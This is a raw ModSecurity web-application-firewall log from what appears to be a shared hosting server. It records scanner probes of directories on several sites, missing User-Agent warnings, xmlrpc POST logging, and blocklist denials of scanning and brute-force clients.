[Tue May 26 17:06:04.941339 2026] [security2:error] [pid 851641:tid 851772] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/upload/"] [unique_id "ahWFpBp8QSN2510avp44VAAAAAE"]
[Tue May 26 17:06:05.243604 2026] [security2:error] [pid 851641:tid 851838] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpRp8QSN2510avp44YAAAAEM"]
[Tue May 26 17:06:05.243663 2026] [security2:error] [pid 851641:tid 851838] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpRp8QSN2510avp44YAAAAEM"]
[Tue May 26 17:06:05.244172 2026] [security2:error] [pid 851641:tid 851833] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/admin/uploads/"] [unique_id "ahWFpRp8QSN2510avp44XgAAAD4"]
[Tue May 26 17:06:05.430808 2026] [security2:error] [pid 851641:tid 851832] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFpBp8QSN2510avp44XQAAAD0"]
[Tue May 26 17:06:05.536918 2026] [security2:error] [pid 851641:tid 851814] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpRp8QSN2510avp44bAAAACs"]
[Tue May 26 17:06:05.536942 2026] [security2:error] [pid 851641:tid 851814] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpRp8QSN2510avp44bAAAACs"]
[Tue May 26 17:06:05.537481 2026] [security2:error] [pid 851641:tid 851887] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/Admin/uploads/"] [unique_id "ahWFpRp8QSN2510avp44agAAAHQ"]
[Tue May 26 17:06:05.636324 2026] [security2:error] [pid 851641:tid 851848] [client 45.151.139.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpRp8QSN2510avp44cgAAAE0"], referer: https://www.anujtradingco.com/
[Tue May 26 17:06:05.648227 2026] [security2:error] [pid 851641:tid 851808] [client 45.79.207.110:37986] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahWFpRp8QSN2510avp44cwAAACU"]
[Tue May 26 17:06:05.803898 2026] [security2:error] [pid 851641:tid 851802] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpRp8QSN2510avp44dgAAAB8"]
[Tue May 26 17:06:05.803935 2026] [security2:error] [pid 851641:tid 851802] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpRp8QSN2510avp44dgAAAB8"]
[Tue May 26 17:06:05.809580 2026] [security2:error] [pid 851641:tid 851791] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/admin/"] [unique_id "ahWFpRp8QSN2510avp44dAAAABQ"]
[Tue May 26 17:06:07.014442 2026] [security2:error] [pid 851641:tid 851823] [client 103.174.5.177:31865] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWFpRp8QSN2510avp44eAAAADQ"]
[Tue May 26 17:06:07.367804 2026] [security2:error] [pid 851641:tid 851775] [client 89.117.104.11:32986] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-admin/index.php"] [unique_id "ahWFphp8QSN2510avp44iwAAAAQ"]
[Tue May 26 17:06:07.664244 2026] [security2:error] [pid 851641:tid 851774] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFpxp8QSN2510avp44mgAAAAM"]
[Tue May 26 17:06:07.720905 2026] [security2:error] [pid 851641:tid 851858] [client 45.151.139.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpxp8QSN2510avp44ogAAAFc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 17:06:08.181754 2026] [security2:error] [pid 851641:tid 851833] [client 89.117.104.11:32986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.104.117.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWFpxp8QSN2510avp44ngAAAD4"]
[Tue May 26 17:06:08.181943 2026] [security2:error] [pid 851641:tid 851833] [client 89.117.104.11:32986] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWFpxp8QSN2510avp44ngAAAD4"]
[Tue May 26 17:06:08.745975 2026] [security2:error] [pid 851641:tid 851785] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqBp8QSN2510avp44sAAAAA4"]
[Tue May 26 17:06:08.746016 2026] [security2:error] [pid 851641:tid 851785] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqBp8QSN2510avp44sAAAAA4"]
[Tue May 26 17:06:08.767806 2026] [security2:error] [pid 851641:tid 851892] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/images/"] [unique_id "ahWFqBp8QSN2510avp44rgAAAHk"]
[Tue May 26 17:06:09.028532 2026] [security2:error] [pid 851641:tid 851843] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqBp8QSN2510avp44vQAAAEg"]
[Tue May 26 17:06:09.028558 2026] [security2:error] [pid 851641:tid 851843] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqBp8QSN2510avp44vQAAAEg"]
[Tue May 26 17:06:09.035489 2026] [security2:error] [pid 851641:tid 851786] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/assets/"] [unique_id "ahWFqBp8QSN2510avp44uwAAAA8"]
[Tue May 26 17:06:09.339557 2026] [security2:error] [pid 851641:tid 851886] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqRp8QSN2510avp44zwAAAHM"]
[Tue May 26 17:06:09.339585 2026] [security2:error] [pid 851641:tid 851886] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqRp8QSN2510avp44zwAAAHM"]
[Tue May 26 17:06:09.344753 2026] [security2:error] [pid 851641:tid 851807] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/"] [unique_id "ahWFqRp8QSN2510avp44zQAAACQ"]
[Tue May 26 17:06:09.588009 2026] [security2:error] [pid 851641:tid 851873] [client 72.14.178.148:41649] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWFqRp8QSN2510avp440AAAAGY"]
[Tue May 26 17:06:09.676173 2026] [security2:error] [pid 851641:tid 851860] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFqRp8QSN2510avp44yQAAAFk"]
[Tue May 26 17:06:09.953223 2026] [security2:error] [pid 851641:tid 851829] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqRp8QSN2510avp444gAAADo"]
[Tue May 26 17:06:09.953284 2026] [security2:error] [pid 851641:tid 851829] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqRp8QSN2510avp444gAAADo"]
[Tue May 26 17:06:09.953506 2026] [security2:error] [pid 851641:tid 851856] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/upload/image/"] [unique_id "ahWFqRp8QSN2510avp444AAAAFU"]
[Tue May 26 17:06:10.324929 2026] [security2:error] [pid 851641:tid 851893] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqhp8QSN2510avp446gAAAHo"]
[Tue May 26 17:06:10.324975 2026] [security2:error] [pid 851641:tid 851893] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqhp8QSN2510avp446gAAAHo"]
[Tue May 26 17:06:10.325732 2026] [security2:error] [pid 851641:tid 851794] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/assets/images/"] [unique_id "ahWFqhp8QSN2510avp446AAAABc"]
[Tue May 26 17:06:10.722561 2026] [security2:error] [pid 851641:tid 851843] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqhp8QSN2510avp44_QAAAEg"]
[Tue May 26 17:06:10.722588 2026] [security2:error] [pid 851641:tid 851843] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqhp8QSN2510avp44_QAAAEg"]
[Tue May 26 17:06:10.752537 2026] [security2:error] [pid 851641:tid 851810] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/Public/"] [unique_id "ahWFqhp8QSN2510avp44-wAAACc"]
[Tue May 26 17:06:11.155142 2026] [security2:error] [pid 851641:tid 851867] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqxp8QSN2510avp45BgAAAGA"]
[Tue May 26 17:06:11.155188 2026] [security2:error] [pid 851641:tid 851867] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqxp8QSN2510avp45BgAAAGA"]
[Tue May 26 17:06:11.155806 2026] [security2:error] [pid 851641:tid 851883] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/vendor/"] [unique_id "ahWFqxp8QSN2510avp45BAAAAHA"]
[Tue May 26 17:06:11.437213 2026] [security2:error] [pid 851641:tid 851886] [client 146.174.179.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFqhp8QSN2510avp45AwAAAHM"]
[Tue May 26 17:06:11.546067 2026] [security2:error] [pid 851641:tid 851771] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqxp8QSN2510avp45FQAAAAA"]
[Tue May 26 17:06:11.546103 2026] [security2:error] [pid 851641:tid 851771] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqxp8QSN2510avp45FQAAAAA"]
[Tue May 26 17:06:11.546722 2026] [security2:error] [pid 851641:tid 851788] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/local/"] [unique_id "ahWFqxp8QSN2510avp45EwAAABE"]
[Tue May 26 17:06:11.671049 2026] [security2:error] [pid 851641:tid 851817] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFqxp8QSN2510avp45DAAAAC4"]
[Tue May 26 17:06:11.926128 2026] [security2:error] [pid 851641:tid 851857] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqxp8QSN2510avp45JQAAAFY"]
[Tue May 26 17:06:11.926161 2026] [security2:error] [pid 851641:tid 851857] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFqxp8QSN2510avp45JQAAAFY"]
[Tue May 26 17:06:11.926937 2026] [security2:error] [pid 851641:tid 851851] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/modules/"] [unique_id "ahWFqxp8QSN2510avp45IwAAAFA"]
[Tue May 26 17:06:12.256310 2026] [security2:error] [pid 851641:tid 851813] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrBp8QSN2510avp45LQAAACo"]
[Tue May 26 17:06:12.256344 2026] [security2:error] [pid 851641:tid 851813] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrBp8QSN2510avp45LQAAACo"]
[Tue May 26 17:06:12.256982 2026] [security2:error] [pid 851641:tid 851878] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/Site/"] [unique_id "ahWFrBp8QSN2510avp45KwAAAGs"]
[Tue May 26 17:06:12.643567 2026] [security2:error] [pid 851641:tid 851809] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrBp8QSN2510avp45OgAAACY"]
[Tue May 26 17:06:12.643604 2026] [security2:error] [pid 851641:tid 851809] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrBp8QSN2510avp45OgAAACY"]
[Tue May 26 17:06:12.644248 2026] [security2:error] [pid 851641:tid 851810] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/system/"] [unique_id "ahWFrBp8QSN2510avp45OAAAACc"]
[Tue May 26 17:06:12.957932 2026] [security2:error] [pid 851641:tid 851811] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrBp8QSN2510avp45PgAAACg"]
[Tue May 26 17:06:12.957961 2026] [security2:error] [pid 851641:tid 851811] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrBp8QSN2510avp45PgAAACg"]
[Tue May 26 17:06:12.958592 2026] [security2:error] [pid 851641:tid 851891] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/template/"] [unique_id "ahWFrBp8QSN2510avp45PAAAAHg"]
[Tue May 26 17:06:13.375756 2026] [security2:error] [pid 851641:tid 851897] [client 203.194.101.7:51492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFrRp8QSN2510avp45RgAAAH4"]
[Tue May 26 17:06:13.375885 2026] [security2:error] [pid 851641:tid 851897] [client 203.194.101.7:51492] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFrRp8QSN2510avp45RgAAAH4"]
[Tue May 26 17:06:13.655799 2026] [security2:error] [pid 851641:tid 851876] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrRp8QSN2510avp45VQAAAGk"]
[Tue May 26 17:06:13.655833 2026] [security2:error] [pid 851641:tid 851876] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrRp8QSN2510avp45VQAAAGk"]
[Tue May 26 17:06:13.661390 2026] [security2:error] [pid 851641:tid 851852] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/shop/"] [unique_id "ahWFrRp8QSN2510avp45UwAAAFE"]
[Tue May 26 17:06:13.930340 2026] [security2:error] [pid 851641:tid 851846] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFrRp8QSN2510avp45UQAAAEs"]
[Tue May 26 17:06:14.035607 2026] [security2:error] [pid 851641:tid 851783] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrRp8QSN2510avp45WwAAAAw"]
[Tue May 26 17:06:14.035662 2026] [security2:error] [pid 851641:tid 851783] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrRp8QSN2510avp45WwAAAAw"]
[Tue May 26 17:06:14.036185 2026] [security2:error] [pid 851641:tid 851804] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/files/"] [unique_id "ahWFrRp8QSN2510avp45WQAAACE"]
[Tue May 26 17:06:14.361425 2026] [security2:error] [pid 851641:tid 851803] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrhp8QSN2510avp45aAAAACA"]
[Tue May 26 17:06:14.361453 2026] [security2:error] [pid 851641:tid 851803] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrhp8QSN2510avp45aAAAACA"]
[Tue May 26 17:06:14.362129 2026] [security2:error] [pid 851641:tid 851793] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/admin/editor/"] [unique_id "ahWFrhp8QSN2510avp45ZgAAABY"]
[Tue May 26 17:06:14.646167 2026] [security2:error] [pid 851641:tid 851849] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrhp8QSN2510avp45bQAAAE4"]
